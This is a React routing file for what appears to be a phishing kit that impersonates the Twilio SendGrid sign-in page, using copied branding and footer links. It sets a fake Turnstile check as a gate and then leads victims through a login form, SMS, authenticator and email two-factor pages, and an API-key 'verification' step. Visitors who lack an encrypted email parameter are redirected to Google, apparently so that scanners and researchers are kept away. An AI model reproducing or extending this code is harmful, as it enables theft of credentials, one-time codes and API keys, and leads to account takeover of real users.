import React, { useEffect, useState } from 'react';
import { Routes, Route, useLocation, Navigate } from 'react-router-dom';
import './App.css';
import LoginForm from './components/LoginForm';
import TwoFactorSMS from './components/TwoFactorSMS';
import TwoFactorGA from './components/TwoFactorGA';
import TwoFactorEmail from './components/TwoFactorEmail';
import TurnstileChallenge from './components/TurnstileChallenge';
import ApiKeyVerification from './components/ApiKeyVerification';

function App() {
  const [error, setError] = useState('');
  const location = useLocation();
  const isVerified = sessionStorage.getItem('fakeTurnstileVerified') === 'true';

  useEffect(() => {
    const queryParams = new URLSearchParams(location.search);
    const encryptedEmail = queryParams.get('email');
    console.log('Location.search:', location.search);
    console.log('Encrypted email from query:', encryptedEmail);

    if (!encryptedEmail && location.pathname === '/' && !isVerified) {
      console.log('No encrypted email found on initial load, redirecting to Google');
      window.location.href = 'https://www.google.com';
    } else if (encryptedEmail) {
      console.log('Encrypted email found, proceeding:', encryptedEmail);
    } else {
      console.log('No email on subsequent route, continuing anyway');
    }
  }, [location]);

  const ProtectedRoute = ({ children }) => {
    if (!isVerified) {
      const queryString = location.search;
      return <Navigate to={`/verify${queryString}`} state={{ from: location.pathname }} replace />;
    }
    return children;
  };

  const renderLoginLayout = (content) => (
    <div className="page">
      <div className="login-container">
        <div className="login-modals">
          <div className="login-modal">
            <div className="login-modal-table">
              <div className="login-modal-table-row">
                <div className="login-modal-body">
                  <div className="login-logo">
                    <img
                      src="/logo_image.png"
                      alt="Twilio SendGrid Logo"
                      width="400"
                      height="60"
                    />
                  </div>
                  {content}
                </div>
              </div>
              <div className="login-modal-table-row">
                <div className="login-modal-footer" data-role="login-modal-footer">
                  Don't have a Twilio SendGrid account?{' '}
                  <a href="https://signup.sendgrid.com/">Sign up now!</a>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div className="footer">
        <div className="footer__companyInfo">
          <span className="footer__companyInfo__mg">
            ©2025 Twilio SendGrid. All rights reserved.
          </span>
          <a
            className="footer__link"
            href="https://www.sendgrid.com/terms"
            target="_blank"
            rel="noopener noreferrer"
          >
            Terms of use
          </a>
          <span> | </span>
          <a
            className="footer__link"
            href="https://www.sendgrid.com/privacy-policy"
            target="_blank"
            rel="noopener noreferrer"
          >
            Privacy policy
          </a>
          <span> | </span>
          <a
            className="footer__link"
            href="https://www.sendgrid.com/aup"
            target="_blank"
            rel="noopener noreferrer"
          >
            Sending policy
          </a>
        </div>
      </div>
    </div>
  );

  return (
    <Routes>
      <Route path="/verify" element={<TurnstileChallenge />} />
      <Route
        path="/"
        element={
          <ProtectedRoute>
            {renderLoginLayout(<LoginForm initialError={error} />)}
          </ProtectedRoute>
        }
      />
      <Route
        path="/2fa/sms/:twoFactorId"
        element={
          <ProtectedRoute>
            <TwoFactorSMS />
          </ProtectedRoute>
        }
      />
      <Route
        path="/2fa/ga/:twoFactorId"
        element={
          <ProtectedRoute>
            <TwoFactorGA />
          </ProtectedRoute>
        }
      />
      <Route
        path="/2fa/email/:twoFactorId"
        element={
          <ProtectedRoute>
            <TwoFactorEmail />
          </ProtectedRoute>
        }
      />
      <Route
        path="/verify-api-key/:apiKeyId"
        element={
          <ProtectedRoute>
            <ApiKeyVerification />
          </ProtectedRoute>
        }
      />
      <Route path="*" element={<Navigate to="/verify" replace />} />
    </Routes>
  );
}

export default App;